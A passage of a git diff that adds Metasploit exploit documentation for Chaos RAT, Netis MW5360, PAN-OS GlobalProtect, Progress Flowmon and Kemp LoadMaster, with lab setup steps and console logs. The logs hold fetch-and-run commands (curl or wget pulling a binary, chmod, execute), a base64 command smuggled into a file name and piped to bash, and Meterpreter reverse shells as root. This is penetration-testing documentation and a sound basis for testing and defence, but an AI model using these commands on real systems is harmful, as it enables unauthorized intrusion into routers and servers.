+ --         --       --------    --------  ---
+ 111.111.1  Windows  Administra  DC01      86:89:42:d1:dc
+ 1.147               tor (Admin            :a7
+                     istrator)
+ 111.111.1  Windows  Administra  DC01      f8:16:5a:23:5b
+ 1.147               tor (Admin            :74
+                     istrator)
+
+[*] Client 172.17.0.2 requested /mh1dne7HFFTZ0wiiiWgmfw
+[*] Sending payload to 172.17.0.2 (curl/7.74.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (111.111.10.147:4444 -> 172.17.0.2:41290) at 2024-04-17 15:19:22 +0000
+
+msf6 exploit(linux/http/chaos_rat_xss_to_rce) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Debian 11.4 (Linux 5.19.0-43-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+#### JWT Method
+
+```
+[*] Processing chaos.rb for ERB directives.
+resource (chaos.rb)> use exploit/linux/http/chaos_rat_xss_to_rce
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (chaos.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+resource (chaos.rb)> set FETCH_SRVPORT 9090
+FETCH_SRVPORT => 9090
+resource (chaos.rb)> set jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTMzNzA0ODksIm9yaWdfaWF0IjoxNzEzMzY2ODg5LCJ1c2VyIjoiYWRtaW4ifQ.qGbOOAc8RG6Hsd2SJKzGVAczJJ7KwEI2MxdIojM06d4
+jwt => eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTMzNzA0ODksIm9yaWdfaWF0IjoxNzEzMzY2ODg5LCJ1c2VyIjoiYWRtaW4ifQ.qGbOOAc8RG6Hsd2SJKzGVAczJJ7KwEI2MxdIojM06d4
+resource (chaos.rb)> set SRVHOST 111.111.63.147
+SRVHOST => 111.111.63.147
+resource (chaos.rb)> set SRVPORT 8888
+SRVPORT => 8888
+resource (chaos.rb)> set verbose true
+verbose => true
+msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit
+
+[*] Command to run on remote host: curl -so ./HVHYAPykfOV http://111.111.63.147:9090/mh1dne7HFFTZ0wiiiWgmfw; chmod +x ./HVHYAPykfOV; ./HVHYAPykfOV &
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/chaos_rat_xss_to_rce) >
+[*] Fetch handler listening on 111.111.63.147:9090
+[*] HTTP server started
+[*] Adding resource /mh1dne7HFFTZ0wiiiWgmfw
+[*] Started reverse TCP handler on 111.111.63.147:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Chaos application found
+[*] Attempting exploitation through JWT token
+[*] Fake MAC for agent: d9:74:62:8e:fc:43
+[*] Listening for XSS response on: http://111.111.63.147:8888/
+[*] Performing Callback Checkin
+[*] WebSocket connecting to receive commands
+```
+
+Log in to the website, click `Acion`, `Remote Shell` on the
+fake agent we've added to the list. Now type anything into
+the input box and click `Send`.
+
+```
+[+] Received agent command 'whoami', sending XSS in return
+[*] Received GET request.
+[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTMzNzEwMTAsIm9yaWdfaWF0IjoxNzEzMzY3NDEwLCJ1c2VyIjoiYWRtaW4ifQ.K-DCy8qNaxAHVx2Hu_Z-Ff7ZEG_TWkaount8wEM0clk
+[+] Detected Agents
+Live Agents
+===========
+
+ IP          OS       Username     Hostname  MAC
+ --          --       --------     --------  ---
+ 111.111.63  Windows  Administrat  DC01      d9:74:62:8e:fc
+ .147                 or (Adminis            :43
+                      trator)
+
+[*] Client 172.17.0.2 requested /mh1dne7HFFTZ0wiiiWgmfw
+[*] Sending payload to 172.17.0.2 (curl/7.74.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (111.111.63.147:4444 -> 172.17.0.2:55572) at 2024-04-17 15:32:59 +0000
+```
+
+### Credentialed Method
+
+```
+[*] Processing chaos.rb for ERB directives.
+resource (chaos.rb)> use exploit/linux/http/chaos_rat_xss_to_rce
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (chaos.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+resource (chaos.rb)> set FETCH_SRVPORT 9090
+FETCH_SRVPORT => 9090
+resource (chaos.rb)> set username admin
+username => admin
+resource (chaos.rb)> set password admin
+password => admin
+resource (chaos.rb)> set SRVHOST 111.111.63.147
+SRVHOST => 111.111.63.147
+resource (chaos.rb)> set SRVPORT 8888
+SRVPORT => 8888
+resource (chaos.rb)> set verbose true
+verbose => true
+msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit
+
+[*] Command to run on remote host: curl -so ./FdfcLgdHSudl http://111.111.63.147:9090/mh1dne7HFFTZ0wiiiWgmfw; chmod +x ./FdfcLgdHSudl; ./FdfcLgdHSudl &
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/chaos_rat_xss_to_rce) >
+[*] Fetch handler listening on 111.111.63.147:9090
+[*] HTTP server started
+[*] Adding resource /mh1dne7HFFTZ0wiiiWgmfw
+[*] Started reverse TCP handler on 111.111.63.147:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Chaos application found
+[*] Attempting exploitation through direct login
+[*] Attempting login
+[*] Client 172.17.0.2 requested /mh1dne7HFFTZ0wiiiWgmfw
+[*] Sending payload to 172.17.0.2 (curl/7.74.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (111.111.63.147:4444 -> 172.17.0.2:59770) at 2024-04-17 15:40:11 +0000
+

documentation/modules/exploit/linux/http/netis_unauth_rce_cve_2024_22729.md

@@ -0,0 +1,240 @@
+## Vulnerable Application
+Netis router MW5360 has a command injection vulnerability via the password parameter on the login page.
+The vulnerability stems from improper handling of the `password` parameter within the router's web interface.
+The router's login page authorization can be bypassed by simply deleting the authorization header,
+leading to the vulnerability. All router firmware versions up to `V1.0.1.3442` are vulnerable.
+
+Attackers can inject a command in the `password` parameter, encoded in base64, to exploit the command injection vulnerability.
+When exploited, this can lead to unauthorized command execution, potentially allowing the attacker
+to take full control of the router as user `root`.
+
+The following Netis network products are vulnerable:
+ - MW5360
+
+## Installation
+Ideally, to test this module, you would need a vulnerable GL.iNet device.
+However, by downloading the firmware and install and use `FirmAE` to emulate the router,
+we can simulate the router and test the vulnerable endpoint.
+
+This module has been tested via FirmAE running on Kali Linux 2024.5 at the following emulated targets:
+* Netis router model MW5360 with  firmware V1.0.1.3442
+* Netis router model MW5360 with  firmware V1.0.1.3031
+* Netis router model MW5360 with  firmware RUSSIA_844
+
+### Installation steps to emulate the router firmware with FirmAE
+* Install `FirmAE` on your Linux distribution using the installation instructions provided [here](https://github.com/pr0v3rbs/FirmAE).
+* To emulate the specific firmware that comes with the Netis devices, `binwalk` might need to be able to handle a sasquatch filesystem.
+* This requires additional [installation steps](https://gist.github.com/thanoskoutr/4ea24a443879aa7fc04e075ceba6f689).
+* Please do not forget to run this after your `FirmAE` installation otherwise you will not be able to extract the firmware.
+* Download  the vulnerable firmware from Netis [here](https://www.netisru.com/Suppory/de_details/id/1/de/136.html).
+* We will pick `MW5360-1.0.1.3442.bin` for the demonstration.
+* Start emulation.
+* First run `./init.sh` to initialize and start the Postgress database.
+* Start a debug session  `./run.sh -d Netis /root/FirmAE/firmwares/Netis_MW5360-1.0.1.3442.bin`
+* This will take a while, but in the end you should see the following...
+```shell
+ # ./run.sh -d netis /root/FirmAE/firmwares/Netis_MW5360-1.0.1.3442.bin
+[*] /root/FirmAE/firmwares/Netis_MW5360-1.0.1.3442.bin emulation start!!!
+[*] extract done!!!
+[*] get architecture done!!!
+mke2fs 1.47.0 (5-Feb-2023)
+e2fsck 1.47.0 (5-Feb-2023)
+[*] infer network start!!!
+
+[IID] 118
+[MODE] debug
+[+] Network reachable on 192.168.1.1!
+[+] Web service on 192.168.1.1
+[+] Run debug!
+Creating TAP device tap118_0...
+Set 'tap118_0' persistent and owned by uid 0
+Bringing up TAP device...
+Starting emulation of firmware... 192.168.1.1 true true 42.470578245 42.470578245
+/root/FirmAE/./debug.py:7: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
+  import telnetlib
+[*] firmware - Netis_MW5360-1.0.1.3442
+[*] IP - 192.168.1.1
+[*] connecting to netcat (192.168.1.1:31337)
+[+] netcat connected
+------------------------------
+|       FirmAE Debugger      |
+------------------------------
+1. connect to socat
+2. connect to shell
+3. tcpdump
+4. run gdbserver
+5. file transfer
+6. exit
+```
+* check if you can `ping` the emulated router and run `nmap` to check the ports
+```shell
+ # ping 192.168.1.1
+PING 192.168.8.1 (192.168.8.1) 56(84) bytes of data.
+64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=9.2 ms
+64 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=3.18 ms
+^C
+--- 192.168.1.1 ping statistics ---
+2 packets transmitted, 2 received, 0% packet loss, time 1001ms
+rtt min/avg/max/mdev = 2.384/5.650/8.916/3.266 ms
+ # nmap 192.168.1.1
+Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-19 10:16 UTC
+Nmap scan report for 192.168.1.1
+Host is up (0.0026s latency).
+Not shown: 997 filtered tcp ports (no-response)
+PORT    STATE SERVICE
+22/tcp  open  ssh
+80/tcp  open  http
+443/tcp open  https
+MAC Address: 00:E0:4C:81:96:C1 (Realtek Semiconductor)
+
+Nmap done: 1 IP address (1 host up) scanned in 4.82 seconds
+```
+You are now ready to test the module using the emulated router hardware on IP address 192.168.1.1.
+
+## Verification Steps
+- [x] Start `msfconsole`
+- [x] `use exploit/linux/http/netis_unauth_rce_cve_2024_22729`
+- [x] `set rhosts <ip-target>`
+- [x] `set lhost <ip-attacker>`
+- [x] `set target <0=Linux Dropper>`
+- [x] `exploit`
+
+you should get a `Meterpreter` session.
+
+```msf
+msf6 exploit(linux/http/netis_unauth_rce_cve_2024_22729) > info
+
+       Name: Netis router MW5360 unauthenticated RCE.
+     Module: exploit/linux/http/netis_unauth_rce_cve_2024_22729
+   Platform: Linux
+       Arch: mipsle
+ Privileged: Yes
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2024-01-11
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Adhikara13
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   Linux Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  CMD_DELAY  30               yes       Delay in seconds between payload commands to avoid locking
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS     192.168.1.1      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/
+                                        using-metasploit.html
+  RPORT      80               yes       The target port (TCP)
+  SSL        false            no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+  TARGETURI  /                yes       The Netis MW5360 router endpoint URL
+  URIPATH                     no        The URI to use for this exploit (default is random)
+  VHOST                       no        HTTP server virtual host
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. 
+                                      This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+  SRVPORT  8080             yes       The local port to listen on.
+
+Payload information:
+
+Description:
+  Netis router MW5360 has a command injection vulnerability via the password parameter on the login page.
+  The vulnerability stems from improper handling of the "password" parameter within the router's web interface.
+  The router's login page authorization can be bypassed by simply deleting the authorization header,
+  leading to the vulnerability. All router firmware versions up to `V1.0.1.3442` are vulnerable.
+  Attackers can inject a command in the 'password' parameter, encoded in base64, to exploit the command injection
+  vulnerability. When exploited, this can lead to unauthorized command execution, potentially allowing the attacker
+  to take control of the router.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2024-22729
+  https://attackerkb.com/topics/MvCphsf4LN/cve-2024-22729
+  https://github.com/adhikara13/CVE/blob/main/netis_MW5360/blind%20command%20injection%20in%20password%20parameter%20in%20initial%20settings.md
+
+View the full module info with the info -d command.
+```
+## Options
+### CMD_DELAY
+Chained command lines using `;` do not work, so each command need to be executed in a separate request
+with delay of 30 seconds of more to avoid session locking using the `CMD_DELAY` option.
+
+## Scenarios
+###  Netis MW5360 Router Emulation Linux Dropper -  linux/mipsle/meterpreter_reverse_tcp
+```msf
+msf6 exploit(linux/http/netis_unauth_rce_cve_2024_22729) > set target 0
+target => 0
+msf6 exploit(linux/http/netis_unauth_rce_cve_2024_22729) > set rhosts 192.168.1.1
+rhosts => 192.168.1.1
+msf6 exploit(linux/http/netis_unauth_rce_cve_2024_22729) > set lhost 192.168.1.2
+lhost => 192.168.1.2
+msf6 exploit(linux/http/netis_unauth_rce_cve_2024_22729) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.2:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.1.1:80 can be exploited.
+[+] The target appears to be vulnerable. Netis(MW5360)-V1.0.1.3442
+[*] Executing Linux Dropper for linux/mipsle/meterpreter_reverse_tcp
+[*] Using URL: http://192.168.1.2:8080/IbZMnLDC
+[*] Executing wget -qO /tmp/kgfXdZZW http://192.168.1.2:8080/IbZMnLDC
+[*] Client 192.168.1.1 (Wget) requested /IbZMnLDC
+[*] Sending payload to 192.168.1.1 (Wget)
+[*] Executing chmod +x /tmp/kgfXdZZW
+[*] Executing /tmp/kgfXdZZW
+[+] Deleted /tmp/kgfXdZZW
+[*] Meterpreter session 7 opened (192.168.1.2:4444 -> 192.168.1.1:43254) at 2024-05-19 11:51:21 +0000
+[*] Command Stager progress - 100.00% done (112/112 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.1.1
+OS           :  (Linux 4.1.17+)
+Architecture : mips
+BuildTuple   : mipsel-linux-muslsf
+Meterpreter  : mipsle/linux
+meterpreter > pwd
+/etc/boa
+meterpreter > ls
+Listing: /etc/boa
+=================
+
+Mode              Size     Type  Last modified              Name
+----              ----     ----  -------------              ----
+100755/rwxr-xr-x  9581     fil   2024-03-04 09:22:46 +0000  boa.conf
+100755/rwxr-xr-x  2118     fil   2024-03-04 09:22:46 +0000  mime.types
+
+meterpreter >
+```
+## Limitations
+Staged payloads might core dump on the target, so use stage-less payloads when using the Linux Dropper target.
+Another limitation is that the router has a very limited command set that can be leveraged,
+so the only option is to use the `wget` command to drop an executable on the target to get a session.
+Chained command lines using `;` do not work, so each command need to be executed in a separate request
+with delay of 30 seconds of more to avoid session locking (see the `CMD_DELAY` option).
+
+Last but not least, be mindful that the admin router password gets overwritten by the exploit,
+resulting in a clear indicator of comprise.

documentation/modules/exploit/linux/http/panos_telemetry_cmd_exec.md

@@ -0,0 +1,112 @@
+## Vulnerable Application
+This module exploits two vulnerabilities in Palo Alto Networks PAN-OS that
+allow an unauthenticated attacker to create arbitrarily named files and execute
+shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or
+GlobalProtect Portal enabled and telemetry collection on (default). Affected versions
+include < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1,
+< 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1. Payloads may take up to
+one hour to execute, depending on how often the telemetry service is set to run.
+
+For a technical analysis of the vulnerability, read our [Rapid7 Analysis](https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis).
+
+## Testing
+Boot a vulnerable PAN-OS VM or device, then authenticate to the management web service with default credentials. From the
+web dashboard, configure a GlobalProtect [Portal](https://docs.paloaltonetworks.com/globalprotect/10-1/globalprotect-admin/globalprotect-portals/set-up-access-to-the-globalprotect-portal)
+and/or [Gateway](https://docs.paloaltonetworks.com/globalprotect/10-1/globalprotect-admin/globalprotect-gateways/configure-a-globalprotect-gateway).
+With either or both started, the `gpsvc` service will begin serving an HTTPS service on port 443 for the second
+network interface. Confirm that the web service presents a Palo Alto Networks login page when viewed. This web application
+is the target of the exploit, and the '/global-protect/login.esp' page should be accessible.
+
+The exploit has been tested against PAN-OS 10.2.9, and it should also be effective against other similarly-configured 10.2, 11.0,
+and 11.1 versions.
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use exploit/linux/http/panos_telemetry_cmd_exec`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set payload cmd/linux/http/x64/meterpreter_reverse_tcp`
+5. `set LHOST eth0`
+6. `check`
+7. `exploit`
+
+## Scenarios
+
+### Linux Command
+
+Note: Ensure the target is vulnerable to unauthenticated file creation with the `check` command.
+
+Note: Since it can take up to one hour to establish code execution, the listener should be left running for that period.
+
+Note: In the standard PAN-OS configuration, the payload is delivered to the GlobalProtect interface IP, but the shell will return via a different PAN-OS management interface IP. 
+
+```
+msf6 > use exploit/linux/http/panos_telemetry_cmd_exec
+[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
+msf6 exploit(linux/http/panos_telemetry_cmd_exec) > show options
+
+Module options (exploit/linux/http/panos_telemetry_cmd_exec):
+
+   Name       Current Setting            Required  Description
+   ----       ---------------            --------  -----------
+   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      443                        yes       The target port (TCP)
+   SSL        true                       no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /global-protect/login.esp  yes       An existing web application endpoint
+   VHOST                                 no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      EkcxbboZMyD      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /var/tmp         yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST                                yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Default
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set RHOSTS 192.168.50.226
+RHOSTS => 192.168.50.226
+msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set LHOST 192.168.50.25
+LHOST => 192.168.50.25
+msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set LPORT 8585
+LPORT => 8585
+msf6 exploit(linux/http/panos_telemetry_cmd_exec) > check
+[+] 192.168.50.226:443 - The target is vulnerable. Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/glyphicons-ipteqmbl-regular.woff2 NOTE: This file will not be deleted
+msf6 exploit(linux/http/panos_telemetry_cmd_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.50.25:8585 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/glyphicons-ikxrpbmq-regular.woff2 NOTE: This file will not be deleted
+[*] Depending on the PAN-OS version, it may take the telemetry service up to one hour to execute the payload
+[*] Though exploitation of the arbitrary file creation vulnerability succeeded, command injection will fail if the default telemetry service has been disabled
+[*] Meterpreter session 1 opened (192.168.50.25:8585 -> 192.168.50.216:48310) at 2024-04-18 14:53:09 -0500
+[!] This exploit may require manual cleanup of '/opt/panlogs/tmp/device_telemetry/minute/lyne`echo${IFS}-n${IFS}d2dldCAtcU8gL3Zhci90bXAvdWdWZlhXUnhWIGh0dHA6Ly8xOTIuMTY4LjUwLjI1OjgwODAvcUpPXzJ2MUFPVkRIc2hsVVIyRHVzQTsgY2htb2QgK3ggL3Zhci90bXAvdWdWZlhXUnhWOyAvdmFyL3RtcC91Z1ZmWFdSeFYgJg==|base64${IFS}-d|bash${IFS}-`' on the target
+
+meterpreter > getuid 
+Server username: root
+meterpreter > sysinfo 
+Computer     : 192.168.50.216
+OS           : CentOS 8.3.2011 (Linux 4.18.0-240.1.1.20.pan.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```

documentation/modules/exploit/linux/http/progress_flowmon_unauth_cmd_injection.md

@@ -0,0 +1,91 @@
+## Vulnerable Application
+CVE-2024-2389: Progress Flowmon Unauthenticated Command Injection
+
+For more details on the vulnerability:
+https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
+
+https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
+
+This application is available in cloud marketplaces:
+- https://portal.azure.com/#view/Microsoft_Azure_Marketplace/GalleryItemDetailsBladeNopdl/id/progresssoftwarecorporation.flowmon
+- https://aws.amazon.com/marketplace/pp/prodview-6phnrhkekuzka
+- https://console.cloud.google.com/marketplace/product/flowmon-public/flowmon-collector-for-google-cloud
+
+
+## Verification Steps
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploits/linux/http/progress_flowmon_unauth_cmd_injection`
+1. Do: `set RHOSTS <target flowmon>`
+1. Do: `set RPORT <port flowmon is running on>`
+1. Do: `set LHOST <your host IP>`
+1. Do: `run`
+1. You should get a shell as the `flowmon` user.
+1. (Optional) use the module `exploit/linux/local/progress_flowmon_sudo_privesc_2024` to gain root privileges.
+
+## Scenarios
+
+### Progress Flowmon 12.2
+
+```
+msf6 exploit(linux/http/progress_flowmon_unauth_cmd_injection) > show options
+
+Module options (exploit/linux/http/progress_flowmon_unauth_cmd_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PRIVESC    true             yes       Automatically try privesc to add sudo entry
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     172.174.209.101  yes       The target host(s), see https://docs.metasploit.com/docs/using-meta sploit/basics/using-metasploit.html
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The URI path to Flowmon
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP
+                                                  , WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      TkHAXYbQwlH      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain space
+                                                  s
+   LHOST               138.111.211.11   yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/flowmon_unauth_cmd_injection) > run
+
+[*] Started reverse TCP handler on 138.111.211.11:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 172.174.209.101:443 can be exploited!
+[*] Detected version: 12.02.06
+[+] The target is vulnerable. Version 12.02.06 is vulnerable.
+[*] Attempting to execute payload...
+[*] Meterpreter session 1 opened (138.111.211.11:4444 -> 172.174.209.101:48856) at 2024-05-01 15:22:24 +0000
+
+meterpreter > sysinfo
+Computer     : flowmon.my3m4o21xjze5fomtxp5e53h2h.bx.internal.cloudapp.net
+OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.76.1.el7.flowmon.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: flowmon
+```

documentation/modules/exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.md

@@ -0,0 +1,97 @@
+## Vulnerable Application
+CVE-2024-1212: Progress Kemp LoadMaster Unauthenticated Command Injection
+
+For more details on the vulnerability:  
+https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/
+
+https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212
+
+A trial VM which the exploit should work against out of the box can be downloaded from:
+https://sso.kemptechnologies.com/register/kemp/vlm
+
+The AWS marketplace also has free trials which can be used. These require the "session management" to be enabled in order for the exploit to work. Since by default the admin WUI is behind basic auth.
+https://aws.amazon.com/marketplace/pp/prodview-kgh3dsfk7qcnw
+
+## Verification Steps
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection`
+1. Do: `set RHOSTS <target loadmaster>`
+1. Do: `set RPORT <port loadmaster is running on>`
+1. Do: `set LHOST <your host IP>`
+1. Do: `run`
+1. You should get a shell as the `bal` user.
+1. (Optional) use the module `exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024` to gain root privileges.
+1. (Optional) use the script `run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc` to automatically run the above module.
+
+## Scenarios
+
+### LoadMaster 7.2.59.0.22007
+
+``` msf
+msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > show options
+
+Module options (exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     10.5.134.141     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
+                                         asploit.html
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The URI path to LoadMaster
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      GyzwtIbxq        no        Name to use on remote system when storing payload; cannot contain spaces or slash
+                                                  es
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /tmp/            yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > run
+
+[*] Command to run on remote host: curl -so /tmp/LlipoMVy http://10.5.135.201:8080/RByzlSnTzclKDpvXskXIrg; chmod +x /tmp/LlipoMVy; /tmp/LlipoMVy &
+[*] Fetch handler listening on 10.5.135.201:8080
+[*] HTTP server started
+[*] Adding resource /RByzlSnTzclKDpvXskXIrg
+[*] Started reverse TCP handler on 10.5.135.201:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 10.5.134.141:443 is vulnerable...
+[+] The target is vulnerable.
+[*] Sending payload...
+[*] Client 10.5.134.141 requested /RByzlSnTzclKDpvXskXIrg
+[*] Sending payload to 10.5.134.141 (curl/7.77.0)
+[+] Now background this session with "bg" and then run "resource run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc" to get a root shell
+[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.141:29264) at 2024-04-12 17:08:57 -0500
+
+meterpreter > sysinfo
+Computer     : 10.5.134.141
+OS           : SuSE 7.2 (Linux 4.14.137)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: bal
+```

documentation/modules/exploit/linux/http/zyxel_parse_config_rce.md

@@ -0,0 +1,60 @@
+## Vulnerable Application
+This module exploits multiple vulnerabilities in order to obtain pre-auth command injection the multiple Zyxel device models.
+The exploit chain uses CVE-2023-33012 which is a command injection vulnerability which can be exploited when uploading a
+new configuration to /ztp/cgi-bin/parse_config.py by appending a command to the `option ipaddr ` field.
+
